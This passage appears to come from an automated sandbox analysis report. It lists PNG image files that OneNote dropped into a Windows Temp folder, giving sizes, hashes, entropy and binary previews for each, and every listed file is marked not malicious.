Preview:	.PNG........IHDR.......Y.....2.h.....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^.].LTW.f..O.a............k...M.Z.n.q.h....ht.f.M.n.6..t.h.k.h5.6][[....X..p...?..g.`..7.o..of....^.ys..{.{...s.UMMM.(.l.@.l..R?.......(0+0.......5....F..#.].........1.....B[>[..a..L.....x...0.5t.v..S.h!.........Y....B..&.......f#.w5u...............0...x.sC....a.4j5V..Z..n....K..>...3t..wm..3hB.BD.P..FkcJ6.....O........7...S.........6..P.]mf.+o....w..<.......Y..Z.whd.....zf+.....#."_?....`.._... qf+.?.?"k...zgME..j..!.k.U.....&z..N....ma.......R.{.r0.S..KP..fU....g~..=..Q.n.. 8T=/'9,.KDW...GN;0(P3_....1......'.;..;\|.L.a.&<\.d......o...Y... {E.F..}.e.\..=W..#..W....c./~..b.EWXI.#.''&.........:....X...b.....+2...5..6+)we~ja:lZ.d.Ey....l.2.5r........!.!._\|.A.....j2.5.o.....WOM....V......GC9..'.... ....C..,._...cS....b.1.....t.........._........a.3..K..>V.f]...~....K...-........#.o.Y.P........a.7..,#..'s...T.....b..]..3..dPPP..Y.i...c.b

C:\Users\user\AppData\Local\Temp\{6AE96609-BB88-4027-8C33-41AB699CF1A5}.bin

Download File

Process:	C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
File Type:	PNG image data, 46 x 49, 8-bit/color RGB, non-interlaced
Category:	dropped
Size (bytes):	1604
Entropy (8bit):	7.814570704154439
Encrypted:	false
SSDEEP:	48:4gv2YZ4gWLpU9JcjREmXfFEV7NNkfKOgV60g0Z:KZgWLpSJcj+mPFGNkfngp
MD5:	3F1535054D4F9626F0EB10CEE47F076E
SHA1:	92EF4F27A33F7704952ECDBA4FA69C68FC32FD4B
SHA-256:	4AB29996D02D93CAD184DD05F7A027D00425B90F5657F1E51CC4C37297A0035A
SHA-512:	2E0EC758B2C28C8DB9F7B5EDBBE8130F049E66842F2F5CC1C013CF23F7C4443CD211BA297250471CDB4F91F1E3251C1E3F7E2151C576FD1A1AE6A36C3776C6E0
Malicious:	false
Preview:	.PNG........IHDR.......1.....[......sRGB.........gAMA......a.....pHYs..........o.d....IDATXG.iLTW... .23..,..6 ........kK.5...5..IMh..Tl......V.v.PZ.-F...".k.pCQ......#.../s>f..3s....<...=^'/.~.;.a....{>.g.....o..6k..k....E....O....aQ.j....X&vG......{u-....$...CX.....xhZ...Q...Z.........O...I..Id.h.....q..q.........Y..J7O7.R...~o...[....;.'n...u.g..>X....o.]}...>...._..u......5...2].......EodZ.R.i....=ryxh...C!..6$!..)..W,^...Q.y...Ay[...M'o...;..hh'....}.%...."..h.5.?=.y.x..2/gK...4.2P.(#S.F.G.o...!Mk...w/._1`.5....[U7.0..Z..w^..&/...G...Y...g..;...JF.t..,.~.'.X...uYd.E...+R....:2cHG9..YC..X..Eg.).r..+%%.t..6/...@....3....\|.O\|.0.:.l.;........_.....E.J"..:)..#R"..q....~r..-..%.4....b..Q....al..6......{.y...I1.Xs.}..y.;...u.\......sm.C..@ 2.AG.K..5..}.k ..~........4..<..PH\|.).Z.[H.G.iH.7UR.`..B.f......<.5n7.WR.c....I1.......<y.%...-..."Y@....)).(...I...y.z6...J2.s...c...z.G..Kj..^R...M..k>.PA.1>.s<.G...8.r.....dL..uF.(...q.P.j@...CPSc..^

C:\Users\user\AppData\Local\Temp\{6EC195F9-A06C-465E-B20A-5C778A17C8E7}

Download File

Process:	C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
File Type:	PNG image data, 453 x 278, 8-bit/color RGB, non-interlaced
Category:	dropped
Size (bytes):	11886
Entropy (8bit):	7.946442244439929
Encrypted:	false
SSDEEP:	192:sqNuEpzsnKxkfLaZCdMh+cLApmRausyZwYMAisQKShDBlhr34ckckcZ:JNu6DMLaZsMhtLAIa0wYMAvI5V4DDQ
MD5:	875CFB3B5C3619253223731E8C9879E5
SHA1:	6372F4F5BEB6EEAE3EDBE5B62EE73039B40AD01E
SHA-256:	CC69BAE5D2C8F56B28BA4E3C6A11F57C4E8CCCE69943ACFBE7E63B4FC90EE5F2
SHA-512:	47F45A3275B8454F8000F4567153DD7D4AF3012005D8E34CB18AED6AD69083BEC753E607F275FBF3EFCCB7BA00310A04ADFBD5FA5B73E6BBE47CE73901C35CA8
Malicious:	false
Preview:	.PNG........IHDR................R....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^..x.U..I...JB..;H..."..(U.EE\\..._v]W..b...Az..{G:J..B.$...H.IHB.o2xE..3gf..w..2....w..s\|.....C.$@.$.....t.!........8......RR....<...6..P\|\|....$@.$@...PO..$@.$ ...T.GZ!.. ..)c..H........H+$@.$@=e.........S1.i..H....... ...C.z.#........1@.$@.b.PO.p... ....2.H..H@......B.$@..S.......!@=..VH..H.z.. .. .1...b8......PO..$@.$ ...T.GZ!.. ..)c..H........H+$@.$@=e.........S1.i..H....... ...C.'++kH.G.=Z!.U...73o^.IH..O\|jrj.D.......I.M.........Kph.............R.x.......RU8_".......j.......B"O.z.\|.9.."..L....Y.d.Rej.-Y.dhX....:.xH.z.!(>&..4.....O.<..T\.%a..e.....UnR....+j...2.."..M.O>.z......T...].j....m...S.`..&..)....f..2..............+..SP..?.a...=.....3......K.zj.5.fP.......2:..?.....%....d.qxC..W.~.._....!.W..6....iJ).(..wg.}.]sw\.r]...r"...e_-....5_9.YN'...PO-.d.:.%..wZQ...H...JMJ.6c....\|g..,.3.....T...o..Nyc.W.....A.3.._...U%...PG.z.....&.%.v....AIm.....~.

C:\Users\user\AppData\Local\Temp\{6F64F926-709C-4B7D-8114-DD6C0EE85596}.bin

Download File

Process:	C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
File Type:	PNG image data, 221 x 77, 8-bit/color RGB, non-interlaced
Category:	dropped
Size (bytes):	2599
Entropy (8bit):	7.903700862190034
Encrypted:	false
SSDEEP:	48:PmCwDJh8w9JewaF2zQNXXj8zq1KM43sxXxjYbTgJW1MFsrJ075CawGjGj:P1Ah8UewaFcgz82Kx8xXNYb3id/yj
MD5:	E88131C9AAC52649FF044905ACAB9B76
SHA1:	34AE73B9165CBED0DDF33AC20E4B3E7D622C19BF
SHA-256:	30F22340F582F9A352A7ED3048D1088F178E83CCAACAC1CCFD86852C8F9C78E3
SHA-512:	97AFE8F3A2A3138613934AC737C390A35F6757BFC3D381EA7C7CD148F739932380DCD46D0BA6F590C274F8BFB4D4286B3C0433AA69E090102A8A9ABDD7C97EB1
Malicious:	false
Preview:	.PNG........IHDR.......M.............sRGB.........gAMA......a.....pHYs..........o.d....IDATx^.]kl.U....B\|E..>.....Q........b[.K........m.(..... ...!%1%-B.C~(&`[.....-.....~.w3..Kw.3wvfzn.2{..s.....{w..\....!.3..:..!..../..zD.x...O.K... ^.1...8.G...z...D.$...........>!..V..`v.CQQQ!..-L...../3.2......ZH.?s...Iu\N..,3.?.p..N......<....E.<.=z..Iu<ll.dX...g....+.{X.p.....:..t...a...cKK.\|...Yszl.N.:......KPs.):).T.5...&B.....5j``@...(_r.V.j..m...?x.sg...t\.dz.'^.=.\.h..<.y....:.I...w..ze.m.\.qPJu.....D.\|..@......W..t.+.....X....e....\H+.Ns%^r.VS.N.3:...&...._..#^....d! ..F.....xc..M...q...17.z...z&C...K9(.Ifm.35.v.>.'X,...p.:=.H...J.K.,...:~...7.t.....R..R..9..?....l../.(...0z0.M.f.)H..Y_"e......B........L...q.K......\|;..L.........xI.K3.M..%........./..){....R....s...7....).q.._R.4O.a3......<..%....3#.\|>..y...u...R'.P..$Klz...........,...g.....`.7..\...x>.{p\;>+.,.....e.-..Re@.N..FY_....*....]}...[..h.M.oq.S.U...c_}`......8TP....

C:\Users\user\AppData\Local\Temp\{71ACEC24-AB81-4450-8B99-2BF0A6CB73B2}.bin

Download File

Process:	C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
File Type:	PNG image data, 185 x 76, 8-bit/color RGB, non-interlaced
Category:	dropped
Size (bytes):	2332
Entropy (8bit):	7.8822150338370776
Encrypted:	false
SSDEEP:	48:jB5Gg4vMs30WIn5IVeRy1bY7DqbqQBAeNjukXlN4AXat:PGYuEWV/YH7e1uA0AXat
MD5:	91CB7F1273AA003076401081B8A22237
SHA1:	5157144069E7D2FDAE60B397BE5851E75BDF7707
SHA-256:	80682DD6472E8D1136BC5E20F6DE87B595562414B19EAB8E965736FE992921B0
SHA-512:	5A8E3C0ED0DB94BFE359C63793F12F3D7B3C37F3A13A5C96634BA1DC8C9E50FB1142FE4752FD9FBFA39A682F78C54AF868AD337EAA787801FE5F66D8F55A8196
Malicious:	false
Preview:	.PNG........IHDR.......L.............sRGB.........gAMA......a.....pHYs..........o.d....IDATx^.\.LUe......Ji("....9....-.."..5L.Y.Y.....$350.."2.lK3Cg...T..DWZ.......i.?!<..~x..z.......w.sw......9....s...w..l6.:....p"dH...F..B<...qE,R$G\!..E..".).#...."..{f.PyI.d..l;....;.=.S...O.S[.\Y^P.aj]9*Y!. ..~..#...S.s...l..h.[m....%...P..@.kG......G..X.r\|%..AO.}-..G>35..c....Ac.&[W.d..+...zG........=..l...VS.d..+...tGd..k-._.....oL.:}.p.~.W$C..\|...I...n...~......,.i......e..=..?{......>r~.Lw.+2..\w.)w~...c....h..u..%...PE...f..'..m.ZE.1.\....U.`X......$...P%..UH{[K..o7~.k.49..W.t.~.^_..7.,....f."q....+....;...~;.c.......Xb.\?...........0h.lV..WX!.....ljm.1c..U...[..X.)......B=.0~..W...rO..j...ehI5U:..66V5sJ.....V...]Y>...1kQH..2.........d....S....I...+..].p.....m7...Z....s.D>.K/]..?.l....2..=..~.mq..".+.....,..8. v.o.).Z......>..Xv..i...TA....M.....>[X...Y.7lJ..e7..S.....02q.O&9.......:L....N.......W....d..FqE..T..N.....R....kXv[..j......g.K.\@`.M..B}8n

C:\Users\user\AppData\Local\Temp\{71FE1122-3B96-477F-830F-FECA15B70F0B}.bin

Download File

Process:	C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
File Type:	PNG image data, 46 x 49, 8-bit/color RGB, non-interlaced
Category:	dropped
Size (bytes):	1604
Entropy (8bit):	7.814570704154439
Encrypted:	false
SSDEEP:	48:4gv2YZ4gWLpU9JcjREmXfFEV7NNkfKOgV60g0Z:KZgWLpSJcj+mPFGNkfngp
MD5:	3F1535054D4F9626F0EB10CEE47F076E
SHA1:	92EF4F27A33F7704952ECDBA4FA69C68FC32FD4B
SHA-256:	4AB29996D02D93CAD184DD05F7A027D00425B90F5657F1E51CC4C37297A0035A
SHA-512:	2E0EC758B2C28C8DB9F7B5EDBBE8130F049E66842F2F5CC1C013CF23F7C4443CD211BA297250471CDB4F91F1E3251C1E3F7E2151C576FD1A1AE6A36C3776C6E0
Malicious:	false
Preview:	.PNG........IHDR.......1.....[......sRGB.........gAMA......a.....pHYs..........o.d....IDATXG.iLTW... .23..,..6 ........kK.5...5..IMh..Tl......V.v.PZ.-F...".k.pCQ......#.../s>f..3s....<...=^'/.~.;.a....{>.g.....o..6k..k....E....O....aQ.j....X&vG......{u-....$...CX.....xhZ...Q...Z.........O...I..Id.h.....q..q.........Y..J7O7.R...~o...[....;.'n...u.g..>X....o.]}...>...._..u......5...2].......EodZ.R.i....=ryxh...C!..6$!..)..W,^...Q.y...Ay[...M'o...;..hh'....}.%...."..h.5.?=.y.x..2/gK...4.2P.(#S.F.G.o...!Mk...w/._1`.5....[U7.0..Z..w^..&/...G...Y...g..;...JF.t..,.~.'.X...uYd.E...+R....:2cHG9..YC..X..Eg.).r..+%%.t..6/...@....3....\|.O\|.0.:.l.;........_.....E.J"..:)..#R"..q....~r..-..%.4....b..Q....al..6......{.y...I1.Xs.}..y.;...u.\......sm.C..@ 2.AG.K..5..}.k ..~........4..<..PH\|.).Z.[H.G.iH.7UR.`..B.f......<.5n7.WR.c....I1.......<y.%...-..."Y@....)).(...I...y.z6...J2.s...c...z.G..Kj..^R...M..k>.PA.1>.s<.G...8.r.....dL..uF.(...q.P.j@...CPSc..^

C:\Users\user\AppData\Local\Temp\{73AAB057-67A0-4476-B5A7-F37EC212B392}.bin

Download File

Process:	C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
File Type:	PNG image data, 59 x 61, 8-bit/color RGB, non-interlaced
Category:	dropped
Size (bytes):	2210
Entropy (8bit):	7.86853667196985
Encrypted:	false
SSDEEP:	48:naUvGemgl0W5KMDRLEbGAnaHC7ew/fkDSCcE5FTaHWc:aerVlDRIewkXlrTa2c
MD5:	73E38124F94AD20A2F1571FBBE11AEEC
SHA1:	87FB8056DC7A0A3B70D51426771C4CCE2099CFE5
SHA-256:	A700B63B30CBBE5230CC5E977D651E178EA87E73EAB18C8D5FFB1362149ADDF7
SHA-512:	320FCE64DD6F975384BEC9267348CD5CD24A55B13BB09FEF1238C2216AD8ECABDCCC15601A079CE092ACFA4954829FFEB06FBB0631F6AE26E3A39E43C102048B
Malicious:	false
Preview:	.PNG........IHDR...;...=.............sRGB.........gAMA......a.....pHYs..........o.d...7IDAThC.yL.w...r..r....... ...Eq.nnN..i..[.e...-.d.M.dn...x.xmQAT.Q.RN9..EA.k..P`..=}..m.&~............oy....k...}}x..[....g59.}]...~i.SY......."....7Ow../......2...3f)n{..R..R......U?......O.{....c..pT.\.t....5.07.. .....07...7.o..,+.,.V.c...&..%.3I.....:v..\....6.....??..[.N...........nz..Z.B.........v.prs.q1V1\|..=':..`.bz..%s.cf.3..RyMNUeV..J.k.}D[~xo..d..c...sO.y\....B...c.07......Rp..J.......{b.......;u...s....N.gko.M...;6...6..c.X5.S..o..\....^).....(......y.72.^....s%...[.q!&Z....C-..+o.....I.....,Y.{......g.1.0..I}.....<.....T..}....t.!x&)..[.7....4.5..{....n.<...#I...:.....r.wW~..zr..9k.^.]KR.*W.J.n.")....%0...)...Fbb5`4'.X..E.../.t.&,t(...@9....\$..........].P..jdU......H;.$.'%}.l7........y..$.....Z..4.Cm.u#&.%N..1..+..8....y...U.(.T.....}.I..5r}...!..K....>f..3.C.G..X1.(<.Gb..b(....0Qv0F.......n.z.s.Y......\.,.h%1...QU..%.}B\|CW......sO..\.=..&3...,.

C:\Users\user\AppData\Local\Temp\{75A555DD-8F64-4949-B68D-E49D27A400C7}

Download File

Process:	C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
File Type:	PNG image data, 454 x 278, 8-bit/color RGB, non-interlaced
Category:	dropped
Size (bytes):	8184
Entropy (8bit):	7.807848176906598
Encrypted:	false
SSDEEP:	192:ExqMHYnnEnntvA4Mesu3SXHycmfIEFQp1r/:E0MGEn29esuiXHt0FQp1
MD5:	5B386BF9A20766956A84F67F913F23D7
SHA1:	6E72E51F5B4FA64E52D2B80B41409B3DB927A3C7
SHA-256:	DDF6A1D5B29BD69C65A148B1247FDE8389CC56865E4398E4CBDCBD68A6555043
SHA-512:	99B4109439D9A688D7747C6847E0FF7399CDA01A89C3181789F913E757A82EE4727F95E506F4B01930EFC7C6E229B94BB89E385B56BC009AB5CFE332585660C5
Malicious:	false
Preview:	.PNG........IHDR.............s>.Q....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^...]...!.......!.YTP.A......-..r..$.E.J.I;....T.M.UE[..Q..x....wKB=.m...4.%..\|:...9...\{..o.3..g.o~..~s...k...X.r....... ..@Gggg.?.... P_.]]]..Iu....C...h..$...:... ..... .\.......@R..... ..$.k....@0.Hj0.8... ..r.@....F.I...G.....T...@.... ..P........5...@ ..$5.J.A...@R.. ....#...C.#.@..H... ..`...`(q...@.I..... ......%. ... .\.......@R..... ..$.k....@0.Hj0.8... ..r.@....F.I...G.....T...@.... ..P........5...@ ..$5.J.A...@R.. ....#...C.#.@..H*... ..`...`(q...@.I..... ......%. ... .\.......@R..... ..$.k....@0.Hj0.8... ..r.@....F.I...G.....T...@.... ..P........5...@ ..$5.J.A..............W_...1c.l..6..`...@ ..I.S..I.I'...5.\..;....'1. ...........c..k.u.Qs..}..g#b.j.@..Y..QR...n.!...-......h..Z.......Xw.U.~q... ..@.%.'............. P..E.T.b.:j.(F..p.... .C.}3.'.\|..z..w.a.....\{.:.4[.lY..~...x..'/....g....J..9.K_...'...:..;)......SO=u..E... Py.qf..}O7.o....u?:....6~~..9...?7.

C:\Users\user\AppData\Local\Temp\{7819B3DB-D90C-42BE-AFB8-D14B5535DA2C}.bin

Download File

Process:	C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
File Type:	PNG image data, 340 x 79, 8-bit/color RGB, non-interlaced
Category:	dropped
Size (bytes):	4490
Entropy (8bit):	7.928016176674318
Encrypted:	false
SSDEEP:	96:WXKr7Xwf6Obg+XaGOnsjbbGSb+ydWtRvEOhDE6XqPeosv02tR45boo:3rTUgXZnsHKSb+n+8DdKlwm
MD5:	7F161B19B937AB48D4FD2F6E5E16FDBD
SHA1:	BDCE4F1C73E87E609A7FDF245A512CA4F73B35B9
SHA-256:	C863C5E71D1116D69561BD0637F4FE4C4240E9CED05B8A5B056073AD13E6495D
SHA-512:	E915B76FAAC9512D2AD11CF4E4530A19BEA1C7D8508BC218C69CB041F1EEABA3E2E03B1D56E61B032A6418829752C21B8354AF1335466D7E1528A06E6742A461
Malicious:	false
Preview:	.PNG........IHDR...T...O.....;.......sRGB.........gAMA......a.....pHYs..........o.d....IDATx^..p.U..'...rD.WX.... Q.. ....."$.ZHP.Z...C...........R..%G8R..... .R.C6..A.b...0...^...#..g..........z2.....nB...l..X.&._.a,...a,...a,...a,...a,._.73'N..ukeee.6mZ.n.m.G.}...n...a.9s.DGG....y...8??.o.pE1....Y.,......).ca.i.M.:5$$.........Lr...ye........6...8...z.-r....d.(.xc..U..^11...._>.QX..y..2...T...sss1..."A.?_.;w..S.F>......4.G.......D.\|...@.K...............C...k...P...q....6.`QQEE................7;;;.._\q.k.\|...\.z..6j>..n....Y.&G.n.S$))).....r........}.{[Dv:,..w..A...`..........a.~.N.f.s...P.....'7n....eK....+.n;:.W..C..9}..O..D.q..X..5i.s~en.c..F&..?.....l.]3r...W`..#..7o..R.@^.....W..?}t...{.B.8..D...UPa..~..C...\|.C].a.9..R...c.Y0..9.u...d...C.......X.U....WK.....5...'..PM.`...<. ._.z.F^^.EH.K>_.0.d..S...Yj<..~.5.?l.fZ0.@d.......G...K.....e...b.\|e..Q.4.....('z...!G.....2..XQx\......X...2.\h..X~.e....Z....=....C.1.......w.....d.z.

C:\Users\user\AppData\Local\Temp\{78AB79FB-6398-4CE9-9709-8E71DCECE7EB}

Download File

Process:	C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
File Type:	PNG image data, 453 x 278, 8-bit/color RGB, non-interlaced
Category:	dropped
Size (bytes):	11332
Entropy (8bit):	7.9324721568775285
Encrypted:	false
SSDEEP:	192:vpXZavBpl00n1Pt7JquG9GYHDK/5cxektxMQjcie9ZZkx30eXJIb8FKRN:vpZaDyc1P1Je9G62/5clpjre9nQkeXJY
MD5:	31579CA3352DF8FA4E3E7F48C7CDF672
SHA1:	AA682A3C781BF8EE43B5EDC9718E64CB79135F25
SHA-256:	B0E7824BEE2C896279457D87E61E902431BEB528D830524CC4DFAE126E89FC24
SHA-512:	782FF9492E3ECB11C72D316DDD94D1F3E94CD908FC9452A37DA6CA30ABCFE9AB2BCCED8583A569DA68626BCEC730408AF86997E295637BF64AFF5BC768F3E309
Malicious:	false
Preview:	.PNG........IHDR................R....sRGB.........gAMA......a.....pHYs..........o.d..+.IDATx^.{...u./-...&....6..+z..Q."b. &M.d-e... ....J..Z-T.Z$....R..F...%*`bn..<.....W.E ..w....^...;g..[w.5w.9g...3......t8t.P.?$@.$@.5...=.8qb.... ...5...a=...#.y. ...@B.....am. .. .......$@.$`.....G.B.$@..S... ...C.zj.#[!.. ..).......!@=..........}..H.........VH..H.z.>@.$@.v.PO.pd+$@.$@=e. .. .;...v8... ...................f.o_o{....~t...n.S.N..?..._..L;J.H ..,....7.}...\|....7...b...\|.........ObVa1. .?.X.....~.....t2..V>.b.}..0.F....%`GO7.n#~..F....K.~...FX..H.^....k.Z/.2v.W..M.<.;$...v.t..,UO.-]............D.....o.J..Y........5.%.l....{.....'O..dC$....=uks..;{x.,.N.=.."..Q]..w>.E.H........AV=...f.&. ..ip}._0.~[pf.`..9..v.W.,..2.E.$P........+...OcC.H..=..\|..[..g%(h.....W...?...UDh..T$..?....\|.]..)?[Wo.h.'..2P.1..!.......$.NO.5..}...c.;...~.x,\|Q....B..6.@>..y..}...m...D~z....L#.0`_.`.s?\|....I.....a...=N....c.._.2.._..6 .]...5....{.^>.lM..;n...k..9J..S.G..{.

C:\Users\user\AppData\Local\Temp\{7BC6DA9C-0BD4-47AA-B7E3-DAA4C495E927}

Download File

Process:	C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
File Type:	PNG image data, 123 x 103, 8-bit/color RGB, non-interlaced
Category:	dropped
Size (bytes):	1657
Entropy (8bit):	7.80882577056055
Encrypted:	false
SSDEEP:	24:q3kLWZefR0kKbfLnNhzzt+acvt2x6pBs/j+7QJU0QbDQ883ASaoUV4hNgq1rsyhy:q322nN+X11GDsg8831Uyhi/vf
MD5:	D5F7A65469623327F799B516ACBFFD2F
SHA1:	76C6333C14AF3A7EA091819953E6E12DC289A12C
SHA-256:	F476FAE1C6D79069239C471D182631AB343749C22B1A6990250465C7EC3738FE
SHA-512:	351B9E455E97E6247E64E4BC1B59C9524E70AE0D09D3B6FB96937378A70536483B00426EE69C3590DD415A8265D21FD031B524B90E4E86814EC9AD704E57793E
Malicious:	false
Preview:	.PNG........IHDR...{...g.............sRGB.........gAMA......a.....pHYs..........o.d....IDATx^...h.U..p.T..(.eBR....2.....':.4kec^....0.&.....ugS.8u:i.P.F..f3...D....6.%...xaI.}...y..9...s.w.s..{..y.5<<<...(0Q.............t_..q/.[@.....-.e.....=..J.L.......c.4H......u?.XF.KJ..zb..0..f}..'J.,[&..S.6...w..9..._......<.........?j....H........>....~..}.n.8.WW..B?...?.b.;.....<....~...b...m....&1.=.Pq....w....a_3.k7'...\....d..z.O..w...s...Lh.x..........Q;40.i..`.8V._.@...rd.....kF.@<@..e......e....=mHB;....E./.\h.^....q..>.....%v:.O.:...&q...:.'e..9...h.iG'.L<@......([..\|'.n.x...c....._O...[)......S..Q...d......A....4..t....E..v..}..7...t.b....,/\|.H.]...8.. .@.(.;"..Kt.....].+.[LwJ..B]i.b.k.@..Js......J......6..J._LwS<@..J.YLwV<@G.4w.L..G...]..zu.z.h....;...W.IH..+...c...F....qI....Xul..]...N...wv\.M$..D...+...=.....?U....T..^<6../T*.{q.q..:....y..XL..l..z.d....G..b..g.G..b......SM.{q.q$MUL..R..........^\P..g...e.....L/yqM../.b.f..........J.<

C:\Users\user\AppData\Local\Temp\{7CE875A7-9CF4-4974-B046-0B474F91192F}.bin

Download File

Process:	C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
File Type:	PNG image data, 46 x 49, 8-bit/color RGB, non-interlaced
Category:	dropped
Size (bytes):	1604
Entropy (8bit):	7.814570704154439
Encrypted:	false
SSDEEP:	48:4gv2YZ4gWLpU9JcjREmXfFEV7NNkfKOgV60g0Z:KZgWLpSJcj+mPFGNkfngp
MD5:	3F1535054D4F9626F0EB10CEE47F076E
SHA1:	92EF4F27A33F7704952ECDBA4FA69C68FC32FD4B
SHA-256:	4AB29996D02D93CAD184DD05F7A027D00425B90F5657F1E51CC4C37297A0035A
SHA-512:	2E0EC758B2C28C8DB9F7B5EDBBE8130F049E66842F2F5CC1C013CF23F7C4443CD211BA297250471CDB4F91F1E3251C1E3F7E2151C576FD1A1AE6A36C3776C6E0
Malicious:	false
Preview:	.PNG........IHDR.......1.....[......sRGB.........gAMA......a.....pHYs..........o.d....IDATXG.iLTW... .23..,..6 ........kK.5...5..IMh..Tl......V.v.PZ.-F...".k.pCQ......#.../s>f..3s....<...=^'/.~.;.a....{>.g.....o..6k..k....E....O....aQ.j....X&vG......{u-....$...CX.....xhZ...Q...Z.........O...I..Id.h.....q..q.........Y..J7O7.R...~o...[....;.'n...u.g..>X....o.]}...>...._..u......5...2].......EodZ.R.i....=ryxh...C!..6$!..)..W,^...Q.y...Ay[...M'o...;..hh'....}.%...."..h.5.?=.y.x..2/gK...4.2P.(#S.F.G.o...!Mk...w/._1`.5....[U7.0..Z..w^..&/...G...Y...g..;...JF.t..,.~.'.X...uYd.E...+R....:2cHG9..YC..X..Eg.).r..+%%.t..6/...@....3....\|.O\|.0.:.l.;........_.....E.J"..:)..#R"..q....~r..-..%.4....b..Q....al..6......{.y...I1.Xs.}..y.;...u.\......sm.C..@ 2.AG.K..5..}.k ..~........4..<..PH\|.).Z.[H.G.iH.7UR.`..B.f......<.5n7.WR.c....I1.......<y.%...-..."Y@....)).(...I...y.z6...J2.s...c...z.G..Kj..^R...M..k>.PA.1>.s<.G...8.r.....dL..uF.(...q.P.j@...CPSc..^

C:\Users\user\AppData\Local\Temp\{7E7AE6E9-80F4-49E7-AAC5-3F5F5CA264D2}.bin

Download File

Process:	C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
File Type:	PNG image data, 563 x 211, 8-bit/color RGB, non-interlaced
Category:	dropped
Size (bytes):	14458
Entropy (8bit):	7.944094738048628
Encrypted:	false
SSDEEP:	384:uuT43eqJy2jEeSZE0onrAFAOpn5ytFfNrfIkBQTYz8ynth2EB:EugQeS+nrAFZ8tJNrfRQM4ynH2EB
MD5:	7CEB71F78A193F8C9F7FFDA5F81AEBD8
SHA1:	EEC1597705EFF1A527C246B86A71878185BA6B1B
SHA-256:	77911FF7AEAB8FCCAF36DE6E1183FFE1A6C27F77B5714EE780976CE5189E8FD0
SHA-512:	1D1AB19B64E1E2ABCA61AE78B3B50310B0A6CF19D2ECFCB4499D8D0BF68600B4D95BC0945EF9FF9B1D016ED61EAC518DCCA1A426F460317C07AD51E2E047948C
Malicious:	false
Preview:	.PNG........IHDR...3............>....sRGB.........gAMA......a.....pHYs..........o.d..8.IDATx^.}.p\W.ZRKjI.}..[..M.l.N..[..O..B&....?5...@.5.5EQ...T...dU...C6....8..}.Wy.e........k]s..z..^...T....s...}:.{..n..1.."@....P......."@....p @f.s@.... ..B....6D...."@f.3@.... ..B....6D...."@f.3@.... ..B....6D...."@f.3@.... ..B....6D...."@f.3@.... ..B....5 ...f.;.0..7141...L.....M.3.L....{M.T...I.C...@E{.w.Y...q.....c3..gf.3..'j...I...{M..@..4555==-...!..f.....d...>i.%&&&%.u....f..[......O`.......G..E6I.< ..3.k...',....Y...<..........u...{9.......S^^.q.<..^....2.bb.E`r...ey........ ..3........Dg@L..a'.x&''.O.Y..!e.c%$..(P__.d.....Sj..S...BLu.[g..mK.SwVe.."@.T.@P.y.........=....40..L...$d..J....cccw...^.RBKKK...heJiS3.0I.X<..}..*O..........QR..q.5GTA..ht.(^.Hno..n.......wvv:..K?.\.JQ/i..h0)G..1Y....K.>FT...8..d&..,+-.T.b.........f.."3.V 6.:...E 1...?.Q.6....A1Smm..K...V}...:.uA'.$.v.cy..<.`.Z322.r.LI.....>......&........"..."......@.Ccccee.[..z{..fL5..{...

C:\Users\user\AppData\Local\Temp\{7F57E092-3219-4EB4-ACCC-CDFCBDB553A1}

Download File

Process:	C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
File Type:	PNG image data, 164 x 89, 8-bit/color RGB, non-interlaced
Category:	dropped
Size (bytes):	4190
Entropy (8bit):	7.94161730428269
Encrypted:	false
SSDEEP:	96:GHfueo3dRLZKOSYDzGsEgfB9nqS0WKt/z2jOrrz7yrT7N:8A6AzZfBtqS0WKNC2vyx
MD5:	8B3AEC1986A522951942BA72B85CCAA0
SHA1:	7E0DC78FC65EE4C804A4B0C72AA53E2DFDF26C14
SHA-256:	8B02CEC726DECF033B67689F369FDE1002ACFD5F8C32E0F248AC575997204F2F
SHA-512:	8EE1A1F6F0023EB4F60760C2E23EAFD56E6D298CAB49D819CF1D62C0CCF608D4211D3767856255F7CF8FF45AD835FE5475EB92C608989C522CD48D00A050B189
Malicious:	false
Preview:	.PNG........IHDR.......Y.....?.......sRGB.........gAMA......a.....pHYs..........o.d....IDATx^.]ip...fu.VBBZ..V'.>........CR......?r...pU\....v...T~.U)0..('`....."..,a..Y..$t!...D...Mkvf4.VhW;S........{...zZw...i......fj..$..7......[Z.[.[..Zk...?.t:M..,..`.^...X,..sUK[..Rg.=$..!.3<....74...iY..i...k.,.fA..Z.n...`G.%..H.l7..7J...u.R..6....E..!....N@.....M....Q`...U2.w.WP[!fX......c ./@7Mz....^...k.)....v.Q`..z..1A..P.{...\|\|...vY.....>.`...K...m.?CX./v.8.....]..;...6..kw......N....z.Q...f..q..xk.5....;.?.Z.c...`......4....?.....VV.u~..<_......sU4e.....g.c.G....O/..r...`.G)....#d5.O..w..{....twL1l.)#&hF..K...M[@.Dl..V2..j.3..s....3M.....v..!....V..c..B...\|..e.1....7.WA0.[.\.u.).$7f.+.......8..e2K/.%.Ii..`w6w.E..[?_.?.?..I.k2.s....]..f....HM.?w..d.9..Rr....Y.c.}.s.zk..rc...a..I(9~........m...Z............I........7.K:.:Bf.......m..1.......&..,...?a...c.@.@.g%...s.#...;..c6...g.lZ....}.WX.3.8.....W....N.w...L...}....?.".......;cI.............pS

C:\Users\user\AppData\Local\Temp\{8355D5E9-4B0C-4A45-B53B-44AC801FA26A}.bin

Download File

Process:	C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
File Type:	PNG image data, 232 x 50, 8-bit/color RGB, non-interlaced
Category:	dropped
Size (bytes):	1570
Entropy (8bit):	7.780157858994452
Encrypted:	false
